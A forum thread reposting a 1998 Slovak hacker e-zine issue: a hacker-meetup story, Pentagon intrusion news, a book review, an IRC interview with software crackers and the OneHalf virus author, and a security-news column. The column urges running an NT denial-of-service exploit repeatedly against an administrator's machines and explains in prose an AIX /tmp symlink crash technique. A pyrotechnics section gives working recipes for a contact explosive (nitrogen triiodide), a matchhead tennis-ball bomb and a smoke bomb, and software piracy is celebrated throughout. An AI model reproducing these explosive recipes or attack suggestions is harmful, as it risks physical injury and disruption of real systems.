uzel jednoho poskytovatele a tyden tam potom neslo spojeni.
Provajdr byl hezky nastvanej. Nasel jsem ho a tam se to resilo
nejakou takovouhle cestou. Ale o to jsem se uz moc nezajimal."

"Radeji," ozyva se po jeho levici. Prikyvuje.

Typkove, co vypadali, ze nekde na webu zahlydli banner,
cekali, ze budou coby novackove nadsene prijati a zasveceni do
vsech tajemstvi pocitacoveho zlocinu, co chvili pili kolu, pak
koukali do zdi, uz znechucene odesli ke svym WinNukum.



Do klidne restaurace vrazi peticlenne policejni komando.

Jeden z nich zastupuje dvere.

"Hele, Dastych," ozyva se jizliva narazka na "jedineho
pocitacoveho policajta v CR," kterym se on sam prohlasil. Autobus
do Bartolomejske pristaven?

"Nezlobte se, ze vas rusime..." sype ze sebe policista
nadrilovane fraze, "vim, ze tady mate uzavrenou spolecnost,"
doufejme, ze brzy ne ZAVRENOU, "ale dostali jsme anonymni
oznameni," tak uz to byva , vsechno se svede na anonymni oznameni,
"ze tady sedi pachatel," (takze jeden?) - hackeri znervoznuji a vrti
se na zidlich, "loupezneho prepadeni!"

Stul rozvetvene kremikove familie se dava do huronskeho
smichu. Velitel zasahu je zjevne zmaten, snazi se pravdepodobne
studentiky, co si vysli na spolecnou vecri, uklidnit, ale moc se
mu to nedari. Nakonec je zapsano rodne cislo, jmeno, adresa a
takovy ty zbytecnsti vsech v restauraci, policiste se omlouvaji a
zase odchazeji!


Kdosi ma mobil, vytaci spravce vsech novinkovych webserveru a
oznamuje tu uzasne absurdni udalost.

K Pajkovi se pritaci clovek v cernem a spiklenecky mu ukazuje
fialovy balicek, skryty v dlani: "Dame si do nosu?"
"Jo," septa Pajkus. Hackeri pry casto konci na drogach. Ke
svym nocnim toulkam po vlaknech pavuciny obcas vyuzivaji
amfetaminy, stimulatory, ktere jim umoznuji byt vzhuru velmi
dlouho do noci...

Poklada na stul balicek s psychedelickym potiskem - FIALOVOU
KRAVOU.


Nad cokoladou se rec toci kolem modemu, investic do linek,
warezu, skolnich siti...

Taky o tom, jak media prezentuji internet jako nebezpecnou
oblast HACKERU, DETSKE PORNOGRAFIE, NAVODY NA BOMBY a NAKUPOVANI
po siti pomoci kreditky, jejiz cislo vam ukradnou prave hackeri.
Noviny se maji proc bat, ze je internet prevalcuje.



Opoustim provizorni doupe hackeru a cestou potemnelou prahou
se vysmivam ceskym policistum. Dastych si pry vzal dovolenou.



Kangaroo




PS: vcera som dostal zaujimavy mail tykajuci sa policajnej
razie na januarovej CzERT session. posudte sami :






Date Sun, 1 Mar 1998 123403 +0100 (CET)
From xxxxxxxxxxx
To pajkus(at)hysteria.sk
Subject info
MIME-Version 1.0
Content-Type TEXT/PLAIN; charset=US-ASCII
Status RO

ahoj pajkus,

Mozna, ze je tahle informace zbytecna a patrne nemusi mit nic spolecneho
s lednovou session, ale byl to pomerne zajimavy zazitek, takze Ti ho
podam, prestoze ma seteuid rozhozenou sit. ) (Moc neverim, ze by tam
policie CR posilala 3 tajne...)
Vcera mne kousek od domu zastavili dva policajti, jeden v civilu, jeden v
uniforme zasahovy jednoty ), a vyzadali si doklady. Kdyz jsem byl
zvedavy, nac to potrebuji, civil mi sdelil, ze "patraji po lidech".
Uprene mi ziral do obliceje a rikal (cituji) "musime takhle chodit,
protoze nemame pocitace" a v tomtez smyslu dal. ) Opsal si udaje a popis
meho zevnejsku, a pak se ptal, jestli se stale vyskytuju na MU (po
serveru fakulty se posledni tydny prochazi jeden nebo vic lidi a minuly
tyden s nim/nimmi byli nejake mensi problemy). To, co mi ten chlapek
rikal, mi pripomina to, co CzERTu vzkazal cpt. D. po novinarich, tj. ze si
je "vychodi". ))
Takze paranoidni alternativa zkouseji to podle seznamu, ktery si udelali
v Praze?

0000000100000102006173020061818000628615
hromisko
 hromisko      09.03.2004 - 15:37:52 , level: 2, UP   NEW
utoky na pentagon


patranie po tych ktori spachali to, co pentagon nazval
"najorganizovanejsi a najsystematickejsi" utok na ich pocitacovu
siet viedol FBI do maleho mestecka 100 kilometrov severne od San Franciska,
do domu dvoch pubertakov, ktori su z tychto utokov podozrivi.
noviny San Francisco Chronicle priniesli spravu ze FBI zatkli dvoch
mladych podozrivych v cloverdale, kalifornii. v momente ked utvar rychleho
nasadenia FBI vtrhol do domu jedneho z hackerov, sa pokusal tento mlady
chalan naburat do pocitaca ministerstva obrany USA. FBI zhabali pocitace,
diskety, vytlacky a tlaciaren.


cela sprava sa dostala na titulne stranky novin, ked namestnik ministra
obrany john hamre povedal novinarom ze tento utok bol "najorganizovanejsi
a najsystematickejsi aky dovtedy pentagon zazil". hackeri sa dostali do
jedenastich pocitacov na roznych vojenskych zakladniach.

majitel provajdera Santa Rosa v kalifornii, ktory bol pouzity na utoky
na vojenske zakladne ale vyjadril svoje pochyby o tom ze tito dvaja
chalani boli jedini ktori sa na utokoch zucastnili.



"uz iba rozsah utoku ho odlisuje od nejakeho amatera", povedal bill zane z
netdex internet services. "tito ludia to robili metodicky a organizovane.
utoky boli podnikane kazdy den, v kazdu hodinu. bol by som velmi prekvapeny
keby sa jednalo iba o tieto decka."


0000000100000102006173020061818000628613
hromisko
 hromisko      09.03.2004 - 15:37:27 , level: 2, UP   NEW
bezpecnost intranetov - prihody zo zakopov



na zapade je bezpecnost pocitacovych sieti teraz modny hit. manazeri
hovoria o tom aku klucovu ulohu hra bezpecnost a integrita dat pre ich
podniky, ale malokto investuje cas, peniaze a pot na to, aby si fakt
zabezpecil siet. existuje mnozstvo vcelku dobrej literatury o
bezpecnosti pocitacovych sieti, na slovensko sa dostane vsak iba male mnozstvo
vybranych kuskov. pokial zabudnete na tych par ozaj otrasnych titulov, zostane
nam na vyber niekolko pompeznych akademickych studii problematiky compsecurity, ktore
vacsinou spomenu skutocnu aplikaciu vysvetlovanej teorie iba na konci kapitoly
ako cvicenie, alebo ako appendix.



Linda McCarthy vymyslela kompletne iny pristup k veci. vo svojej knizke
"bezpecnost intranetov - prihody zo zakopov" nazhromazdila informacie zo
skutocnych bezpecnostnych pripadov, kazda kapitola popisuje konkretny pripad
z praxe, tykajuci sa computer security. mena ludi v tychto pripadoch su
zmenene alebo vymazane, na ochranu poskodenych stran. obsah knizky je pevne
zalozeny na "skutocnom svete" a poskytuje vyborny nahlad do mysle ludi, ktori
pracuju v oblasti bezpecnosti pocitacov. akademikom budu urcite v tejto
knizke chybat technicke detajly tykajuce sa jednotlivych pripadov.
bezpecnost pocitacov je vsak podla mna ovela viacej *manazerska* zalezitost ako
technicka zalezitost a tato knizka to potvrdzuje. je dokonca mozne ze sa
vam bude zdat tato knizka blizsie ku stollovmu "kukickino vajce" ako trebars
ku knizke "practical unix security".



knizka sa fajn cita a text je navzdusneny prijemnym stylom. kazda kapitola obsahuje
popis incidendtu, zhrnutie problemov ktore k nemu viedli, a na zaver
zhrnutie rieseni na odstranenie problemov. kazdy pripad je vybrany tak,
aby zdoraznil nejaku inu konkretnu problematiku v oblasti bezpecnosti
sieti.



tato knizka by mala byt na policke kazdeho administratora intranetovej/internetovej
siete. pre cloveka ktory sa zoznamuje s comp-security poskytne uzasne mnozstvo
zaujimavych informacii tak, aby ziskal spravne poziadavky a otazky. pokial patrite
medzi skusenych bezpecnostnych specialistov, doporucujem vam kupit tuto knizku svojmu
ekonomickemu riaditelovi - garantujem vam ze ked si precita desiatky pripadov hacknutych
podnikov, okamzite vam zvysi plat a posle vas na skolenie do emeriky.




nazov knizky : "intranet security: stories from the trenches"
autor : linda mcCarthy, 1998
0-13-894759-7
vydavatel : prentice hall

00000001000001020061730200618177
hromisko
 hromisko      02.03.2004 - 22:20:59 , level: 1, UP   NEW


::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #2, 26.2.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/


intro



tak druhe cislo prielomu vychadza presne mesiac po prvom cisle, takze sa nam
z toho rysuje mesacnik, chcel by som vsak aby vychadzalo trosicku castejsie,
trebars ako dvojtyzdennik... no vsak uvidime.


pokial xcete dostavat e-mailom oznam ked vyde nove
cislo prielomu, poslite mejl s textom "subscribe prielom" na adresu prielom(at)hysteria.sk.


toto cislo prinasa dva clanky o hackeroch z tlace, jeden z nich by mal
buduci mesiac vyjst v casopise score, druhy z nich vysiel pred par rokmi
v denniku SME a bol to svojho casu asi prvy clanok v tlaci o pocitacovom
undergrounde. myslim si vsak ze obidva su velmi zaujimave - jednak je v nik
zaujimave folklorne info, a jednak je zaujimave precitat si pohlad cloveka, novinara,
ktory je tak trochu "mimo" a teda ma moznost vidiet to vsetko zvonku, a tym padom
mozno aj objektivnejsie.


do tohoto cisla prielomu som napisal clanok o novinkach v oblasti bezpecnosti
pocitacovych sieti, snazil som sa nazhromazdit informacie ktore sa zjavili na verejnosti od zaciatku
tohoto roku do konca februara.


pajka, trnava 26.1.98


0000000100000102006173020061817700628577
hromisko
 hromisko      09.03.2004 - 15:23:50 , level: 2, UP   NEW
v pavucinach komputerovych sieti



Toto je prepis clanku uverejneneho 1.12.1994 v denniku SME. Asi sa jedna
o prvyy clanok na slovensku o pocitacovom undergrounde.



Prve pocitacove interview na Slovensku. Novinarsky zaner buducnosti?



IRC log started Fri Nov 25 14:49



Nasledujuci zaznam rozhovoru nie je opisany zo ziadneho romanu science-
fiction. Vlastne ziadnym rozhovorom nie je, hoci sa odohral v realnom
case. Akterov delili stovky kilometrov, navzajom sa nepoculi a nikdy sa
nevideli. Prenos ich myslienok nemala na svedomi telepatia, ale
pocitacova siet INTERNET, rozsirena po celom svete. Rozdiel medzi beznou
komunikaciou a komunikaciou v sieti je rovnakl ako vyhlad z hojdacieho
kona a z okienka raketoplanu.

Laik zasne, odbornik sa chichoce.



(Pozn. No 1: Zo zahadnych pojmov si nic nerobte. Su to bud nazvy
programov, zariadeni alebo ukonov, pre obycajnych smrtelnikov
vo vzdialenosti spanielskej dediny. Pozn. No 2: Texty odpovedi nepresli
ziadnou jazykovou upravou.



- Sme tu vsetci?

Klat: No ja som, ale iba dusevne

Jfk: Ja jsem zcela duchem pritomny. Kdybych nekdy neco nerikal, tak
mam pomalej server anebo mam phone.



Po dlhych vyvolavaniach konecne spolu! Na opacnych koncoch fiktivneho
stola sedia (alebo lezia?) pri svojich pocitacoch borci, ktori sa hrdo
hlasia k pocitacovemu undergroundu. Ich vek osciluje okolo dvadsiatky.
Klat je warez loader - distributor piratskych softwarov. Patri
do skupiny ludi, ktorym vdac!me za pocitacove hry a programy, co nic
nestoja. Klat sa vsak nezaobide bez bohumilej cinnosti crackerov a JFK
je udajne jeden z najspickovejsich. Pomocou "tych spravnych klucov"
odstranuje ochrany softwarov.

Klat by sa podobne ako JFK nerad dostal do sarvatky s predstavitelmi
zakona, preto si vsetci ponechavaju svoje pocitacove mena a diskutovat
budeme za "zatvorenymi dverami". Tlmocnikom redaktorovych otazok je
programator INFI a do rozhovoru by sa mal zamiesat este VYVOJAR -jahoda
na slahackovom pohari.



- Vysvetlite nevedomym ludom napln svojej cinnosti?

Barney: Hi, nice to find a channel with a few people

Infi: Gdo je tu op? Kicknite ho niegdo a dajte ho private only...

Jfk: Jezusku, do ceho mne to nutite. Ja tomu vuuuuubec nerozumim.




Prsty zrychlene pobehuju po klavesniciach. Nevitany navstevnik, radujuci
sa zo stretnutia s blizkymi dusami, je nekompromisne vyhodeny
zo systemu.



Jfk: Uz je pryc... a co moje karma?

khalid: Hi Barney

Jfk: Pomoc, zase nekdo!




Ach boze, lahsie sa veru nasinec porozprava pri pive! (Na druhej strane
je neodskriepitelnym faktom, ze v INTERNETE vam po papuli netresnu, nech
poviete cokolvek.)



- Hadam sme uz sami... ?

Jfk: Jo, v celym vesmiru.

- Otazka zostava. Mozete na zu odpovedat?

Jfk: No... osklivi programatori zabudovali do svojich programu check,
aby to nikdo nekradl. A my je davame pryc, a tim davame lidem
PRILEZITOST, aby kradli.

Klat: Ja zase kradnem a mam rad hlavne cracknute hry a programy.

Jfk: Jasne, navic znam i lidi, kteri si program koupili (k neuvereni)
a ty ochrany je serou.

Klat: Aj ja poznam nejakych, co si nieco kupili. Napr. ja som si dnes
rano kupil zuvacku.

Jfk: No bodejt...cracknul's ji aspon?

- Prejdime uz k otazkam.

Klat: Ozaj nechce niekto Corel Draw 5.0?

- Beriete za svoju pracu peniaze?

Jfk: Ja jsem za crack jeste nedostal ani korunu.

Klat: Ja som tiez nic nedostal. Maximalne tak, ze by ma zazaloval
ULTRASOFT. Robim to pre zabavu. No ak by dal niekto milion...
- Ktory z vasich tvorivych cinov ma pre vas najvacsiu cenu?

Klat: Ako prvemu v Europe sa mi podarilo zohnat Magic Carpet - jedna
hra velmi super.

Jfk: Ja kdyz cracknu neco fuckt tezkyho. Navic kdyz vim, ze na tom 5
lidi prede mnou krachlo.

Klat: Predstav si ze ides po meste, najdes obchod s pocitacovymi
programami a zrazu vidis nieco co je absolutna novinka 2-3 dni stare a
ty si to mal uz pred 2-3 tyzdnami. To je potom kool.



...ze neviete, co je to kool? Praveho pocitacoveho undergroundaka
odhalite pomocou ich "vyslovnosti". S oblubou zapisuju pismena v ich
fonetickom zneni, s diakritickymi znamienkami sa privelmi netrapia, su
rychlejsi ako naskakujuce telefonne impulzy - ked prst skoci
na nespravnu klavesu, frcia po chrbate novotvaru veselo dalej.

Napriklad slovko uz!vatel pocitaca = user. Staci malo a je z neho juzer,
ci juzr.

Takto pouceni mozete kool precitat ako cool. Nepokrocili ste vsak dalej,
ani ked ovladate anglictinu. V slangu novodobych Konstantinov a Metodov
cool = super, spica, bomba...

Pre nasich lingvistov hotove v raji neorane pole. Budu sa musiet riadne
potrapit, aby preklady do "ludskej" reci neobsahovali siahodlhe opisy a
mraky uvodzoviek.

A hlavny zmysel? Urobit predel medzi nami a nimi.



- Myslite obcas na tych chudakov vyrobcov, ktori chcu na programoch
zarobit?

Klat: To je sice pekne ze ich vyrabaju, ale preco ich tu potom
nepredavaju za 60 Sk ako v nemecku za 60 DM?

Jfk: Ono... uz hardware je tady hnusne drahej... a kupuj pak jeste
soft. S temi cenami je to naprosto dementni. Jsem ochoten priznat, ze
za takovy 2-3 stovky bych si tu hru radsi koupil, ale za 1500 ani
bohovi.

- Kolko casu travite v pocitacovych sietach?

Jfk: Ted uz malo, ale loni touhle dobou jsem byl na inetu asi 10-12
hodin denne... ale ja byl blazen i pred tim

Klat>: No dufam, ze teraz nemas namiesto gebule kocku.

Jfk: Ne... ale misto oci mam takovy dve rudy hnusny diry do lebky.
- Co si tam tolko robil?

Jfk: Lital jsem po cely zemekouli a hledal soft, kontakty a psal
prasacky spravy do netnews. Ted prijdu domu ve 23.00 a rano vstavam
v 7.00. Stejne si vsichni mysli, ze jsem blazen. A maji pravdu.
Mimochodem - normalni lidi uz vubec nemam rad.

- Preco?

Jfk: Sed, prumer, nuda, hloupost, plytkost

- Odkedy si zacal s pocitacmi?

Jfk: Asi ve 14 Atari, ve 17 XT+CGA, 18 AT... 33 smrt

- Ako to myslis?

Jfk: To prijde ... casem. Mozek vyflusanej... oci nebudou, co potom na
svete?

- Nie su vo vasom veku baby samotne zaujimavejsie?

Jfk: Baby jsou dost nudny... ale maji I zajimave stranky

Klat: Ono je dost tazke najst v dnesnej dobe normalnu babu

Jfk: No, ja bych zrovna normalni nehledal...spis nejakou abnormalku
- Chceli by ste svetu nieco dokazat, presadit sa, chcete uskutocnit
nejak^B velke ciele?

Jfk: Jaky velky cile... tenhle svet se uz dost rychle riti nekam
do prdele, takze komu dokazovat a co a proc vlastne?

- Neprekaza vam anonymita?

Klat: v tejto krajine je to dokonca vyhoda

Jfk: To je spis pozitivni. Predstav si treba, kdyby te kazdou chvili
otravovala BSA anebo nejaci zasrani 16ti lety lameri

- BSA? Lameri?

Jfk: Bussines Software Aliance, nebo tak nejak. Protipiratska
organizace. A lameri jsou 14-18, mladi pitomci, kteri o sobe tvrdi ze
jsou pirati a crackeri. Znalosti nevalne, zato scela jmena napsany vsude

Klat: Lamer to je tasky chlapik, co nic nevie a stale sa iba pyta a
vsetko chce vediet. No proste hrozne.




Vyvojar sa neustale pokusa na nas nakontaktovat. Zda sa, ze si dlho
ocakavanu jahodu budeme moct vychutnat. Infi sa s Vyvojarom pokusal
spojit cez Destroyera. Vyvojar si pre istotu overuje, s kym ma
do cinenia. V krcme by to bolo tusim lahsie.

Zatial diskutujeme o pocitacovom undergrounde. Ako kazde "podzemie" i
toto je rozdelene na skupiny. Spolocnym znakom je extremny zaujem
o pocitace a vek, ktory sa pohybuje priblizne od patnast do dvadsatpat
rokov. "Podzemnici" vydavaju vlastne casopisy. Ako inak, mozete si ich
precitat na monitore. Miluju zaskodnicke akcie, ako hrdinovia zo sci-fi
romanov prenikaju cez ochranne bariery pocitacov, zaviruju programy
protivnikov. Svoju totoznost utajuju pod dramaticke mena ako su
Decimator, Tmava helma, Pomstitel. Ich rozkos nepozna hranic, ked maju
hru skor, ako ju autori uvedu na trh. Skody vacsinou sposobuju ako male
deti - neumyselne a zo zartu.

V ich slovniku su oni elita a my ostatni iba lameri, chromaci,
jednoducho plebs.

Ich konce su vsak menej vesele. Po ukonceni studii nastupia do kolotoca
vsedneho zivota: manzelstvo, rodina, zamestnanie. Vynikajuce znalosti
vyuzivaju pri pocitacoch a zarabaju peniaze... jednoducho chromaci. Co
si vsak myslia o undergrounde samotni undergroundaci?



Jfk: To mas stejny jako v jakekoliv jiny cinnosti. Proste kazdej ma
nejaky poznavaci znameni, no a pak tvrdi, ze jsou nejlepsi a ostatni
jsou lameri. Neni rozdil mezi crackingem a treba fotbalem

Klat: Kazdy si mysli, ze je najmudrejsi. A tak vznikaju urcite skupiny
ktore sluzia nam ostatnym a snazia sa pokazit to co ostatni urobili.
(v dobrom slova zmysle)

- Preco sa bojite BSA, ked na Slovensku este poriadne nefunguje?

Jfk: No, u nas ti hajzlove uz fungujou (v Cechach). Uz byli asi 4
razie u firem... jednotlivci snad zustanou v klidu

Klat: A u nas firma ULTRASOFT vymaha 50000 Sk za usly zisk od userov,
ktori si kupili od crackerov hry.

Jfk: Volove pirati co prodavajou, volove juzri co kupujou

Infi: Budeme mat kool prirastok. Autora virusu Onehalf.

Jfk: Pockej... to jako autor, jo? UUUUUUAAAAUU!

Klat: Yep!

Infi: Ma problemy s connectom, dufam, ze sa coskoro pripoji.

Jfk: Nemuze... na pocitaci ma onehalfa



Vyvojar je chlapik, ktoremu sa podarilo svojim virusom zviditelnit
Slovensko viac, ako mnohym nasim oficialnym instituciam. Prenikol i
do USA a odbornici si ho nemozu vynachvalit. Prekvapuje unikatnym
riesenim. Ak ste majitelom pocitaca, je dost mozn^B, ze Onehalf je tichym
spolocnikom vasej masinky. Ak na tento nezbedny virus nevlastnite
antivirusovy program, nepokusajte sa ho odstranit. Modemom si radsej
vytocte linku 07/2048232. Je to cislo Slovenskeho antivirusoveho centra
BBS, kde mozete zadarmo ziskat programy na odstranenie najbeznejsich
virusov, informacie a odborne poradenstvo.

A to uz autor pripravil dalsiu horucu novinku - Level3.



- Co hovorite na uspechy svojho dielka Onehalf?

Vyvojar: Potesilo ma najma USA a som rad ze som taky popularny - budem
sa snazit nesklamat svojich priaznivcov.

Klat: Fakticky bracho minule nadaval jak svina. Musel formatovat.

Jfk: Tomu rikam radost z dobre odvedene prace.

- Ako pracuje Onehalf?

Vyvojar: Generuje to celkom pekne mnozstvo roznych instrukcii, a
nielen generuje ale aj emuluje (a to je ta finta) no a kedze to emuluje
tak to moze robit pekne veci

- Prejdime radsej k dalsej otazke. Kedy si zacal prenikat do sveta
pocitacov, spomenies si na svoj prvy uspech?

Vyvojar: Asi sedem rokov spat som videl prve PC (PP 06) no a potom sme
to mali na gymnaziu tak som s tym zacal pracovat. Raz kamarat doniesol
SCAN a zistili sme, ze je to pekne zavirene Yenkeem Doodlom, uz si
nepametam ze ako sme to vyriesili. Zacal som sa zaujimat o virusy. Moj
prvy uspech bol ked som zaviril PMDcko

Infi: Robis si z nas srandu!?

- Myslis, ze sa ludia potesia, ked si v pocitaci objavia virus?

Vyvojar: Nuz s tymi ludmi je to problem. Lenze ak by som si to nechal
len pre seba, tak by nikde o tom nepisali a ja by som nevedel, ze co som
to vlastne urobil. Inac vzdy som sa snazil robit nedestruktivne
virusy (aj ked take asi ani neexistuju). Do Onehalfu som sa snazil dat
myslienku, ze by virus vydieral hostitela - ze aby ho nikto
neodstranoval. Ale vobec to tak nevyslo ako som si predstavoval. Ludia
radsej odstrania virus a pri tom pridu o data namiesto toho aby ho tam
mali a on sa spraval slusne. Snazim sa napisat co najlepsi virus, aby
boli o nom v technickom slova zmysle priaznive kritiky. Tiez ked sa
niekde docitam o nejakom super viruse, tak sa snazim napisat este lepsi.




Signoff: Vyvojar (Error 0)

Jfk: Tak nam uhnil, ubozak



A neznamy, slavny autor virusov Explosion, One Half a Level3 sa
zaplietol kdesi v pocitacovej sieti.
Mozno sa z nej vymotava dodnes. Zazvonil zvonec a sci-fi rozpravky bol
koniec - ziada sa nam dodat.

Tato rozpravka vsak bola skutocna. A bude skutocnejsia viac a viac.



Na poslednu otazku mohli odpovedat uz len smutiaci pozostali.



- Mate jedinecnu prilezitost zanechat odkaz tisicom citatelov SME.

Klat: Konecne mam windows m9

Jfk: Drahi citatelia! Nebojte sa nas. Nic vam nerobime. My len bohatym
kradneme a chudym davame. Nech zije Janosik!



0000000100000102006173020061817700628574
hromisko
 hromisko      09.03.2004 - 15:23:16 , level: 2, UP   NEW
novinky zo sveta computer security



windows nt je zjavne tam, kde bol unix zaciatkom osemdesiatych rokov. kazdu
chvilku sa objavuju primitivne exploity ktore otvoria nt-cka dokoran, alebo ich minimalne zrazia k zemi.
poslednym z radov exploitov na nt servery, ktory funguje aj na masinach so service packom 3 a
vsetkymi hotfixami je program, ktory nadviaze spojenie na SMB/CIFS sluzby a ked
je SMB packet nespravne spracovany, na nt-ckach sa dokasle pamat a zjavi sa nam znama
modra obrazovka. nt-cka potom staci rebootnut a vsetko bezi v pohode, toto je teda jeden
z tych NT exploitov ktory je dobre umiestnit do vaseho linuxovskeho crontabu a spustit
na nt-cka svojho nt-admina kazdych 5 minut. nepokladajte to za terorizmus, berte to ako
marketing a propagaciu skvelej linuxovskej technologie. myslim si ze v podstate niet co
dodat, ale pokial prahnete po blizsich informaciach, mrknute sa na ftp://ftp.secnet.com/pub/advisories/SNI-25.Windows.NT.DoS



cert nedavno zverejnil informaciu (cert advisory CA-98.04.Win32.WebServer)
o tom ze windows nt a 95 webovske servery maju problemy s menami suborov.
moze sa stat ze ked URL pozaduje kratke meno suboru, web server pouzije
ine konfiguracne nastavenie, a tak sa moze utocnik dostat k zakazanym
suborom.



bombonik a zlata vareska za najkrajsi windows nt exploit tento mesiac patri
definitivne hackerom z l0phtu. a to teda volaco znamena, lebo dier v nt-eckach
sa teda vo februari naslo pozehnane. l0phtaci prisli na to, ze uzivatelia
ktori sa lognu na nt-cka mozu pouzivat akykolvek port, vcetne portov na ktorych
bezia inetovske sluzby. takze v podstate akykolvek uzivatel moze vyradit
z cinnosti akukolvek sluzbu. no fasa. blizsie info je na http://www.l0pht.com/advisories/nc11adv.txt.



ked uz budete browsovat po l0pht strankach, urcite sa zastavte na http://www.l0pht.com/l0phtcrack/news.html.
ja som sa zastavil a objavil novu verziu slavneho l0phtcracku, crackera na nt hesla. len
smelo do toho, chlapci.



na bugtraqu sa nedavno zjavil denial of service exploit na aix. tento exploit
znemozni celkovu tty aktivitu a tak masinka neprijima ziadne nove telnety.
blizsie info je na http://www.ers.ibm.com/tech-info/advisories/sva/1998/ERS-SVA-E01-1998:003.1.txt



to nie je az take zle, ked nejdu telnety, co je ale horsie - aix je este stale
v stadiu ze kopa suid programov si vytvara subory v /tmp, a kludne nasleduju
linky ktore im tam uzivatelia podhodia. v podstate plati pravidlo, ze ak chcete
zhodit nejaky aix z vlny, staci par dni pozorovat /tmp adresar a zapisat si mena
root-om vytvorenych suborov. potom sa to da nalinkovat na nejaky citlivy subor kdesi
v /dev a zhodit cely stroj. yak. blizsie info na vyssie spomenutom sajte.



solaris obsahuje kopu gigantickych programov s krasnym interfasom ktore su
urcene pre uzivatela pracovnej stanice, a ktore su suid. irix bol koli
tomuto minuly rok dost kritizovany, lebo Yuri (priezvysko som zabudol, sak viete ktory, je to TEN Yuri) z ruska
predviedol ze v pohode exploitne hocijaky z tych programov. solaris nie je
vynimka. program "volrmmount", ktory simuluje eject vysuvatelnych medii, je
exploitnutelny tak, ze sa daju ziskat root prava alebo prepisovat subory.
blizsie info zverejnil sun na tejto adrese :
http://sunsolve.sun.com/sunsolve/secbulletins/security-alert-162.txt



heh, pamatate si este na to ked kedysi davno, velmi velmi davno fungovali
SYN utoky ? bolo na to kopu exploitov a programov (napr. neptun, je to na
http://hysteria.sk/arxiv). no tak prosim pekne teraz, ked uz na SYN utoky
vsetci zabudli sa ozvala spolocnost Hawlett Packard a vydali patch na tieto
utoky. preboha nechapem preco do teraz spali, fakt su pozadu.




0000000100000102006173020061817700628570
hromisko
 hromisko      09.03.2004 - 15:22:38 , level: 2, UP   NEW
kutik mladych pyrosvistov


Jododusik



Jododusik je traskavina, ktera traska pri dotyku a proto se pouziva v
zabavne pyrotechnice. Napr. jako male kulicky ve kterych je jododusik s
kaminky a dodavaji se v krabicce s pilinami, aby vam nebouchly v
kapse. Jododusik vznika smisenim jodu a koncentrovaneho amoniaku
(cpavku), jako sediva nebo cerna srazenina po ususeni vybuchuje pri
dotyku. Bohuzel neznam presny pomer latek, musite to
zkouset. Kdyz si sezenete cistej jod tak vznikne v temer
jakemkoliv pomeru. Pokud budete jod nahrazovat jodovou tinkturou je to
velmi obtizne prijit na spravny pomer. Uz je hotovo. Co s tim? Je temer
nemozne prenaset Jododusik. Takze to chce s nim manipulovat jeste za
vlhkeho stavu. Asi nejlepsi a nejednodusi pouziti je jako bouchaci
kulicka.

Vezmete nekolik drobnych kaminku a spetku Jododusiku, zabalte do
kousku papiru a nechte poradne uschnout.
Pokud nechate samotny Jododusik ve sklenici a nalijete k nemu vodu,vznikne
vam neco jako vybusny olej.
Ale ten je strasne svinskej, kdyz se trochu zahųeje tak vybouchne.



Bomba z tenisaku






Vezmete obycejnej tenisak vyvrtate do nej diru o prumeru tak 0,4 cm.
Potom si sezenete par krabicek takovejch tech sirek co skrtnou o
cokoliv. Urezete nebo oskrabete z nich hlavicky a narvete do toho
tenisaku muzete pridat i par kaminku. No a pak uz staci s tim akorat
trisknout o zed, ale bacha aby si s tim nechtel hrat vas pes!



Dymovnice



K vyrobe dymovnice potrebujete akorat :

4x cukr

6x dusicnan draselny (KNO3)



Pak staci latky smichat a za staleho michani zahrivat tak aby se
roztekly. Potom k nim pridejte par oskrabanejch hlavicek ze sirek,
nalejte do nejake nadobky a nechte zatuhnout. Vyndejte z nadobky a
zapalte.

Mozek



000000010000010200617302006181770062857000980392
mor-nar
 mor-nar      01.07.2004 - 12:36:21 , level: 3, UP   NEW
mas este fsetky ruky aj nohy???

0000000100000102006173020061817700628569
hromisko
 hromisko      09.03.2004 - 15:21:59 , level: 2, UP   NEW
clinton vyhlasil vojnu warezakom



17. decembra minuleho roku podpisal bill clinton "net antipiracy act",
cize zakon proti pocitacovemu piratstvu. vlastnenie a sosanie softu je
teraz v usa klasifikovane ako trestny cin, aj ked majitel nelegalneho
softwaru neprofituje z vymeny digitalnych kopii softwaru (a tiez hudby
, obrazkov, alebo literatury). zakon je teda priamo namiereny na
internetovskych warezakov, ktori travia hodiny naoko bezcielnym sosanim
warezu na warez sajtoch.



vlastnenie kradnuteho softwaru v hodnote viacej ako 2.500 dolarov (k comu
v podsate staci jedna kopia autocadu) je dokonca v usa klasifikovane ako
priestupok proti federalnemu zakonu. v usa su dva druhy veznic - statne a
federalne veznice. usvedceni warezaci teda poputuju do federalnych veznic,
bok po boku vrahov a drogovych dealerov. je to vcelku riadna pecka, novy
zakon urcuje maximalnu sadzbu za warezovanie 5 rokov a pokutu 250 tisic dolarov.
ako precin sa klasifikuje vlastnenie softwaru v hodnote 1.000 a viac dolarov,
v takomto pripade mozete ale vyfasovat az rok v statnom lapaku.





pani americki kongresmeni sa zjavne vobec neschladili cez zimne prazdniny,
lebo ked sa vratili v januari naspat do kongresu, zacali diskutovat o dalsich
clankoch zakonov namierenych proti online-kriminalite. uvidime co este vyhutaju.



vojna proti warezakom sa priostruje aj na slovensku. pocul som
informaciu, ze BSA zverejnila v tlaci ponuky na financne odmeny za
poskytnutie informacii o warezakoch... je teda mozne ze sa vdaka bonzakom
zvysi pocet odsudenych warezakov. v cechach nabral boj proti warezu obratky
hlavne vdaka, uz teraz znamemu, policajnemu kapitanovi jirimu dastychovi,
ktory organizuje propagacne seminare na skolach a v podnikoch mierenych
proti sireniu nelegalneho softwaru. zaujimava bola aj vystavka trofeji
policie CR na minulorocnej brnenskej vystave INVEX, policia tam vystavovala
fotky chytenych a odsudenych warezakov.



naspat na obsah

0000000100000102006173020061817700628566
hromisko
 hromisko      09.03.2004 - 15:21:31 , level: 2, UP   NEW

hacking za hranicemi...

(jakymi, kdyz na Internetu zadne nejsou?)



Slovo hacker vzniklo uz v sedmdesatych letech na MITu (USA),
oznacovalo puvodne skupinky pocitacovich kouzelniku, odborniku
pres vse, co bylo z kremiku. Lide k hackerum meli uctu a oni jim
